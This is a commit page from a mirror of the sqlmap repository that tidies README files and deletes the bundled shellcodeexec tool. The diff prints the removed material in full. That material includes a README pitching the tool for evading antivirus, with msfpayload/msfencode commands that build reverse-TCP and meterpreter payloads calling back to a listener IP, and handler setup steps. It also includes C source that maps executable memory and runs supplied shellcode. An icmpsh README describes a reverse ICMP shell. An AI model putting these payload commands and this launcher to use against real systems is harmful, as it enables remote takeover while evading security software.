mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 01:26:42 +03:00
cleanup to README files
This commit is contained in:
parent
7198e3185b
commit
224e6376a6
|
@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible
|
|||
The master is straight forward to use. There are no extra libraries required for the C version.
|
||||
The Perl master however has the following dependencies:
|
||||
|
||||
* IO::Socket
|
||||
* NetPacket::IP
|
||||
* NetPacket::ICMP
|
||||
* IO::Socket
|
||||
* NetPacket::IP
|
||||
* NetPacket::ICMP
|
||||
|
||||
|
||||
When running the master, don't forget to disable ICMP replies by the OS. For example:
|
||||
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
|
||||
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
|
||||
commands send from the master.
|
||||
|
@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below:
|
|||
-t host host ip address to send ping requests to. This option is mandatory!
|
||||
|
||||
-r send a single test icmp request containing the string "Test1234" and then quit.
|
||||
This is for testing the connection.
|
||||
This is for testing the connection.
|
||||
|
||||
-d milliseconds delay between requests in milliseconds
|
||||
|
||||
-o milliseconds timeout of responses in milliseconds. If a response has not received in time,
|
||||
the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
|
||||
the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
|
||||
The counter is set back to 0 if a response was received.
|
||||
|
||||
-b num limit of blanks (unanswered icmp requests before quitting
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
Files in this folder can be used to compile auxiliary program that can
|
||||
be used for running command prompt commands skipping standard "cmd /c" way.
|
||||
They are licensed under the terms of the GNU Lesser General Public License
|
||||
and it's compiled version is available on the official sqlmap subversion
|
||||
repository[1].
|
||||
|
||||
[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
|
||||
They are licensed under the terms of the GNU Lesser General Public License.
|
||||
|
|
|
@ -1,126 +0,0 @@
|
|||
= Short description =
|
||||
|
||||
shellcodeexec is a small script to execute in memory a sequence of opcodes.
|
||||
|
||||
|
||||
= Background =
|
||||
|
||||
Most of the shellcode launchers out there, including proof of concepts
|
||||
part of many "security" books, detail how to allocate a memory page as
|
||||
readable/writable/executable on POSIX systems, copy over your shellcode
|
||||
and execute it. This works just fine. However, it is limited to POSIX,
|
||||
does not necessarily consider 64-bit architecture and Windows systems.
|
||||
|
||||
|
||||
= Description =
|
||||
|
||||
This script and the relevant project files (Makefile and Visual Studio
|
||||
files) allow you to compile the tool once then run your shellcode across
|
||||
different architectures and operating systems.
|
||||
|
||||
Moreover, it solves a common real world issue: the target system's anti
|
||||
virus software blocking a Metasploit-generated payload stager (either EXE
|
||||
of ELF). Take for instance the following command line:
|
||||
|
||||
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
|
||||
|
||||
This generates a Metasploit payload stager, payload.exe, that as soon as
|
||||
it lands on the AV-protected target system is recognized as malicious and
|
||||
potentially blocked (depending on the on-access scan settings) by many
|
||||
anti virus products. At the time of writing this text, 21 out 41 anti
|
||||
viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
|
||||
multiple times with msfencode, less AV softwares detect it, still a lot.
|
||||
|
||||
I have been surfing the Net and found some interesting tutorials and
|
||||
guides about packing, compressing, obfuscating and applying IDA-foo to
|
||||
portable executables et similar in order to narrow down the number of AV
|
||||
products that can detect it as a malicious file. This is all interesting,
|
||||
but does not stop few hard-to-die anti viruses to detect your backdoor.
|
||||
|
||||
So the question is, how cool would it be to have a final solution to avoid
|
||||
all this hassle? This is exactly where this tool comes into play!
|
||||
|
||||
|
||||
= Features =
|
||||
|
||||
shellcodeexec:
|
||||
|
||||
* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
|
||||
|
||||
* Can be compiled and works on 32-bit and 64-bit architectures.
|
||||
|
||||
* As far as I know, no AV detect it as malicious.
|
||||
|
||||
* Works in DEP/NX-enabled environments: it allocates the memory page where
|
||||
it stores the shellcode as +rwx - Readable Writable and eXecutable.
|
||||
|
||||
* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
|
||||
shellcode (generated for instance with Metasploit's msfpayload) to
|
||||
Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
|
||||
BufferRegister variable to EAX registry where the address in memory of
|
||||
the shellcode will be stored, to avoid get_pc() binary stub to be
|
||||
prepended to the shellcode.
|
||||
|
||||
* Spawns a new thread where the shellcode is executed in a structure
|
||||
exception handler (SEH) so that if you wrap shellcodeexec into your own
|
||||
executable, it avoids the whole process to crash in case of unexpected
|
||||
behaviours.
|
||||
|
||||
|
||||
= HowTo =
|
||||
|
||||
1. Generate a Metasploit shellcode and encode it with the alphanumeric
|
||||
encoder. For example for a Linux target:
|
||||
|
||||
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
|
||||
|
||||
Or for a Windows target:
|
||||
|
||||
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
|
||||
|
||||
|
||||
2. Execute the Metasploit multi/handler listener on your machine. For
|
||||
example for a Linux target:
|
||||
|
||||
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
|
||||
|
||||
Or for a Windows target:
|
||||
|
||||
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
|
||||
|
||||
|
||||
3. Execute the alphanumeric-encoded shellcode with this tool. For example
|
||||
on the Linux target:
|
||||
|
||||
$ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
|
||||
|
||||
Or, on the Windows target:
|
||||
|
||||
C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
|
||||
|
||||
|
||||
= License =
|
||||
|
||||
This source code is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
|
||||
|
||||
= Author =
|
||||
|
||||
Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||
|
||||
|
||||
= Homepage =
|
||||
|
||||
https://github.com/inquisb/shellcodeexec
|
4
extra/shellcodeexec/README.txt
Normal file
4
extra/shellcodeexec/README.txt
Normal file
|
@ -0,0 +1,4 @@
|
|||
Binary files in this folder are data files used by sqlmap on the target
|
||||
system, but not executed on the system running sqlmap. They are licensed
|
||||
under the terms of the GNU Lesser General Public License and their source
|
||||
code is available on https://github.com/inquisb/shellcodeexec.
|
|
@ -1,7 +0,0 @@
|
|||
32:
|
||||
gcc -Wall -Os shellcodeexec.c -o shellcodeexec
|
||||
strip -sx shellcodeexec
|
||||
|
||||
64:
|
||||
gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
|
||||
strip -sx shellcodeexec
|
|
@ -1,138 +0,0 @@
|
|||
/*
|
||||
shellcodeexec - Script to execute in memory a sequence of opcodes
|
||||
Copyright (C) 2011 Bernardo Damele A. G.
|
||||
web: http://bernardodamele.blogspot.com
|
||||
email: bernardo.damele@gmail.com
|
||||
|
||||
This source code is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
*/
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
#include <ctype.h>
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
#include <windows.h>
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter);
|
||||
#else
|
||||
#include <sys/mman.h>
|
||||
#include <sys/wait.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
int sys_bineval(char *argv);
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
if (argc < 2) {
|
||||
printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
sys_bineval(argv[1]);
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int sys_bineval(char *argv)
|
||||
{
|
||||
size_t len;
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
int pID;
|
||||
char *code;
|
||||
#else
|
||||
int *addr;
|
||||
size_t page_size;
|
||||
pid_t pID;
|
||||
#endif
|
||||
|
||||
len = (size_t)strlen(argv);
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
// allocate a +rwx memory page
|
||||
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
// copy over the shellcode
|
||||
strncpy(code, argv, len);
|
||||
|
||||
// execute it by ASM code defined in exec_payload function
|
||||
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
|
||||
#else
|
||||
pID = fork();
|
||||
if(pID<0)
|
||||
return 1;
|
||||
|
||||
if(pID==0)
|
||||
{
|
||||
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
|
||||
page_size = (len+page_size) & ~(page_size); // align to page boundary
|
||||
|
||||
// mmap an +rwx memory page
|
||||
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
|
||||
|
||||
if (addr == MAP_FAILED)
|
||||
return 1;
|
||||
|
||||
// copy over the shellcode
|
||||
strncpy((char *)addr, argv, len);
|
||||
|
||||
// execute it
|
||||
((void (*)(void))addr)();
|
||||
}
|
||||
|
||||
if(pID>0)
|
||||
waitpid(pID, 0, WNOHANG);
|
||||
#endif
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
#if defined(_WIN64)
|
||||
void __exec_payload(LPVOID);
|
||||
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__exec_payload(lpParameter);
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__asm
|
||||
{
|
||||
mov eax, [lpParameter]
|
||||
call eax
|
||||
}
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#endif
|
|
@ -1,25 +0,0 @@
|
|||
Before compiling, an enviroment variable has to be set.
|
||||
|
||||
--------------------------------------------------------------------------
|
||||
Variable name Variable description
|
||||
--------------------------------------------------------------------------
|
||||
PLATFORM_SDK_DIR Directory where the Platform SDK is installed
|
||||
|
||||
|
||||
Procedure for setting environment variables on Windows:
|
||||
My Computer -> Properties -> Advanced -> Environment Variables
|
||||
User variables -> New
|
||||
|
||||
|
||||
Sample value:
|
||||
--------------------------------------------------------------------------
|
||||
Variable name Variable value
|
||||
--------------------------------------------------------------------------
|
||||
PLATFORM_SDK_DIR C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
|
||||
|
||||
|
||||
Notes:
|
||||
|
||||
To get as small portable executable as possible compile as follows:
|
||||
* Use Visual C++ 2005
|
||||
* Strip the executable with UPX
|
Binary file not shown.
|
@ -1,138 +0,0 @@
|
|||
/*
|
||||
shellcodeexec - Script to execute in memory a sequence of opcodes
|
||||
Copyright (C) 2011 Bernardo Damele A. G.
|
||||
web: http://bernardodamele.blogspot.com
|
||||
email: bernardo.damele@gmail.com
|
||||
|
||||
This source code is free software; you can redistribute it and/or
|
||||
modify it under the terms of the GNU Lesser General Public
|
||||
License as published by the Free Software Foundation; either
|
||||
version 2.1 of the License, or (at your option) any later version.
|
||||
|
||||
This library is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
Lesser General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU Lesser General Public
|
||||
License along with this library; if not, write to the Free Software
|
||||
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
*/
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <time.h>
|
||||
#include <ctype.h>
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
#include <windows.h>
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter);
|
||||
#else
|
||||
#include <sys/mman.h>
|
||||
#include <sys/wait.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
int sys_bineval(char *argv);
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
if (argc < 2) {
|
||||
printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
sys_bineval(argv[1]);
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int sys_bineval(char *argv)
|
||||
{
|
||||
size_t len;
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
int pID;
|
||||
char *code;
|
||||
#else
|
||||
int *addr;
|
||||
size_t page_size;
|
||||
pid_t pID;
|
||||
#endif
|
||||
|
||||
len = (size_t)strlen(argv);
|
||||
|
||||
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
|
||||
// allocate a +rwx memory page
|
||||
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
// copy over the shellcode
|
||||
strncpy(code, argv, len);
|
||||
|
||||
// execute it by ASM code defined in exec_payload function
|
||||
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
|
||||
#else
|
||||
pID = fork();
|
||||
if(pID<0)
|
||||
return 1;
|
||||
|
||||
if(pID==0)
|
||||
{
|
||||
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
|
||||
page_size = (len+page_size) & ~(page_size); // align to page boundary
|
||||
|
||||
// mmap an +rwx memory page
|
||||
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
|
||||
|
||||
if (addr == MAP_FAILED)
|
||||
return 1;
|
||||
|
||||
// copy over the shellcode
|
||||
strncpy((char *)addr, argv, len);
|
||||
|
||||
// execute it
|
||||
((void (*)(void))addr)();
|
||||
}
|
||||
|
||||
if(pID>0)
|
||||
waitpid(pID, 0, WNOHANG);
|
||||
#endif
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
#if defined(_WIN64)
|
||||
void __exec_payload(LPVOID);
|
||||
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__exec_payload(lpParameter);
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
|
||||
DWORD WINAPI exec_payload(LPVOID lpParameter)
|
||||
{
|
||||
__try
|
||||
{
|
||||
__asm
|
||||
{
|
||||
mov eax, [lpParameter]
|
||||
call eax
|
||||
}
|
||||
}
|
||||
__except(EXCEPTION_EXECUTE_HANDLER)
|
||||
{
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
#endif
|
Binary file not shown.
|
@ -1,6 +1,4 @@
|
|||
Binary files in this folder are data files used by sqlmap on the target
|
||||
system, but not executed on the system running sqlmap. They are licensed
|
||||
under the terms of the GNU Lesser General Public License and their source
|
||||
code is available on the official sqlmap subversion repository[1].
|
||||
|
||||
[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack/
|
||||
code is available on https://github.com/sqlmapproject/udfhack.
|
||||
|
|
Loading…
Reference in New Issue
Block a user